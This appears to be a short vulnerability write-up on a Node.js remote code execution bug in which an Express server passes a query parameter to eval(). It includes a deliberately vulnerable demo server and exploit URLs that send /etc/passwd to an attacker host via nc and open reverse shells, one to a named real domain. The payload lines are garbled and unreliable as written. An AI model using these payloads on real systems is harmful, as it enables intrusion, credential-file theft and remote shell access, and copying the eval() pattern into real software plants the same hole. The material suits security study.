NodeJS remote code execution, nodejs
Background
@Artsploit: While hunting for vulnerabilities in PayPal, a Node.js code execution flaw was found; the reward was $10000 USD.
Test (a minimal Express app that passes the `q` query parameter straight to `eval()`)
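// Deliberately vulnerable demo server: it reproduces the bug class described
// above (request data reaching eval). The listing is restored to valid
// JavaScript; the vulnerable behaviour itself is kept so the page's test case
// still illustrates the flaw. Run it only on an isolated lab host, never on a
// machine reachable from an untrusted network.
var express = require('express');
var app = express();

app.get('/', function (req, res) {
  // SECURITY: eval() on req.query.q runs caller-supplied JavaScript inside the
  // server process, with the process's full privileges and access to
  // require(). No input filter makes this safe; the fix is to remove eval()
  // and parse the value as data (JSON.parse, Number(), an allow-list of
  // expected values).
  // The result is also concatenated into a response that Express serves as
  // text/html, so the same parameter is reflected to the browser unescaped.
  res.send('Hello ' + eval(req.query.q));

  // Raw request data goes to the log unmodified; anything that consumes this
  // log should treat the line as untrusted.
  console.log(req.query.q);
});

// No host argument is given, so the server is not restricted to the loopback
// interface.
app.listen(8080, function () {
  console.log('example listening on port 8080!');
});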
Arbitrary File Reading
Http: // host: 8080 /? Q1_require('child_process'cmd.exe c ('cat +/etc/passwd + | + nc + attackerip + 80 ')
GET SHELL
Http: // host: 8080 /? Q = var + net + = + require ("net"), + sh + = + require ("child_process" cmd.exe c ("/bin/bash "); var + client ++ new + net. socket (); client. connect (80, + "attackerip", + function () {client. pipe (sh. stdin); sh. stdout. pipe (client); sh. stderr. pipe (client );});
GET SHELL2
Http: // host: 8080 /? Q = require ("child_process" cmd.exe c ('bash-c "bash-I> % 26/dev/tcp/wufeifei.com/7890 0> % 261 "')